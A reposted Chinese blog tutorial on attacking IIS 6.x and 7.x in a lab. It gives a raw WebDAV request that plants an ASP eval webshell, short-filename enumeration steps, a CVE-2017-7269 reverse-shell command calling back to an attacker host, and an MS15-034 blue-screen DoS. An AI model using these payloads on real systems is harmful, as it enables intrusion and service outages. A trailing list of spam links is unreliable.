当前位置: 首页 > wzjs >正文

网站备案主体修改wordpress 图文列表

网站备案主体修改,wordpress 图文列表,重庆房地产信息官网,wordpress在线课程主题中间件(英语:Middleware)是提供系统软件和应⽤软件之间连接的软件,以便于软件各部件之间的沟通。 中间件处在操作系统和更⾼⼀级应⽤程序之间。他充当的功能是:将应⽤程序运⾏环境与操作系统隔离,从⽽实…

中间件(英语:Middleware)是提供系统软件和应⽤软件之间连接的软件,以便于软件各部件之间的沟通。    

 中间件处在操作系统和更⾼⼀级应⽤程序之间。他充当的功能是:将应⽤程序运⾏环境与操作系统隔离,从⽽实现应⽤程序开发者不必为更多系统问题忧虑,⽽直接关注该应⽤程序在解决问题上的能⼒ 。容器就是中间件的⼀种。

也就是说,关于中间件,我们可以理解为:是⼀类能够为⼀种或多种应⽤程序合作互通、资源共享,同时还能够为该应⽤程序提供相关的服务的软件。(注意:中间件是⼀类软件的总称,不是单独的⼀个软件)。

IIS(IIS6.x)

PUT漏洞

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传。

环境

fofa:"IIS-6.0"

本地搭建2003 server

开启 WebDAV 和写权限

打开网址,直接抓包 

 发送重放器,修改代码

MOVE /1.txt HTTP/1.1
Host:192.168.80.132
Destination:http://192.168.80.132/shell.asp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 25

<%eval request("cmd")%>

发送后生成shell.jsp 

 可以使用http://192.168.80.132/shell.asp访问

使用菜⼑,蚁剑连接即可

IIS短⽂件漏洞

开启IIS6.0 ASP.NET

Windows 以 8.3 格式⽣成与 MS-DOS 兼容的(短)⽂件名,以允许基于 MS-DOS 或 16位 Windows的程序访问这些⽂件。在cmd下输⼊"dir /x"即可看到短⽂件名的效果

 

创建1223213113.txt 

 

访问:http://upload.moonteam.com/*~1*/a.asp   开始尝试

之后一位一位试就可以了 ,出现无法找到该页,为正确

尝试后缀名

​​ 之后一位一位试就可以了 ,出现无法找到该页,为正确

IIS RCE-CVE-2017-7269

Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If:<http:// 开头的⻓标头执⾏任意代码 PROPFIND请求

WiNdows Server 2003 R2上使⽤IIS6.0并开启 WebDAV扩展。

利⽤⼯具

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

 反弹shell

将工具放到kali

python2 '/home/kali/Desktop/iis6 reverse shell' 192.168.80.132 80 192.168.80.129 6666

IIS   (llS7.x)

HTTP.SYS远程代码执⾏(MS15-034)  MS-->Microsoft 2015 -034

HTTP SYS是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引 ⼊,IIS服务进程依赖HTTP.SY

HTTP.SYS远程代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的 Windows系统发送 特殊设计的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,成功利⽤此漏洞的攻击者可以在系统 帐户的上下⽂中执⾏任意代码。

主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这个漏洞。

环境

windows server 2012 IIS8.5

在主页面右击,点击复制图片链接(后面用)

 使用工具

下载: https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

 python IISDoS.py  

 返回window后出现蓝屏

 


文章转载自:

http://axbTLhEN.wqbzt.cn
http://FXyxluGS.wqbzt.cn
http://RDFgS5nF.wqbzt.cn
http://GnLxkFzp.wqbzt.cn
http://aUzeEOIK.wqbzt.cn
http://L3C23sFM.wqbzt.cn
http://C9SQGDF1.wqbzt.cn
http://abQk3xbs.wqbzt.cn
http://IrzZFcXH.wqbzt.cn
http://Kgtj5ALO.wqbzt.cn
http://2fskH0M7.wqbzt.cn
http://s9d2QjnH.wqbzt.cn
http://s29JfTIT.wqbzt.cn
http://gBux6jPT.wqbzt.cn
http://zX9gk3eZ.wqbzt.cn
http://w18ZJgbI.wqbzt.cn
http://OV62eSYm.wqbzt.cn
http://sBtHsH9S.wqbzt.cn
http://05Pr49id.wqbzt.cn
http://aQMN2M4H.wqbzt.cn
http://Ks6GehGs.wqbzt.cn
http://t9dWW6Vo.wqbzt.cn
http://V5o2sAY3.wqbzt.cn
http://5o4aBolO.wqbzt.cn
http://MqBTgzjs.wqbzt.cn
http://PKUZ9n6r.wqbzt.cn
http://zLa0gjoF.wqbzt.cn
http://LnGBePji.wqbzt.cn
http://21CASP5p.wqbzt.cn
http://W0OR5pzk.wqbzt.cn
http://www.dtcms.com/wzjs/730124.html

相关文章:

  • 湖南网站设计外包哪家好营销型网站服务
  • 网站表格怎么做石家庄网站建设智美
  • 专业做网站推广的公司杭州网站设计制作
  • 接go语言网站开发电子产品网页设计模板
  • 中国最大的门户网站是wordpress多站模式
  • app设计方案计划书长春网站优化服务
  • 口碑好的网站设计制作价格淘宝客网站建设任务
  • 图书馆门户网站建设有哪些公司品牌建设的思路
  • 怎么做网站调查表设计业务网站
  • 网站开发与app开发wordpress手机 主题
  • 四川建设机械网站wordpress入门书籍
  • wordpress废弃函数网站seo优化服务商
  • 网站示例开发网站的基本过程
  • 南京越城建设集团网站u8无可用数据源
  • 国外设计网站欣赏物联网小项目
  • 昌江县住房和城乡建设局网站php mysql网站开发项目
  • 网站部分频道完全不收录了怎么做织梦网站教程
  • 网站建设免费代理附近学电脑在哪里报名
  • 鞍山网站建设找金航青岛建站费用
  • 建网站服务器系统百度免费网站建设
  • 昆明网站建站推广搜索引擎网站建设代码
  • 网站标签图标代码wordpress is
  • 个人网站可以做产品众筹吗店铺推广软文范例
  • 湖南移动官网网站建设东莞公共资源交易中心官网
  • 网站开发制作公自己的网站怎么和百度做友链
  • 简约淘宝网站模板免费下载手机网站架构
  • 静安网站建设关键词优化seo怎么自己做投票网站
  • 石家庄seo网站管理电商网站订货
  • 企业网站优化服务主要围绕哪些要素风格 特别的网站
  • 电子商务网站的建设方法上海公司法人落户条件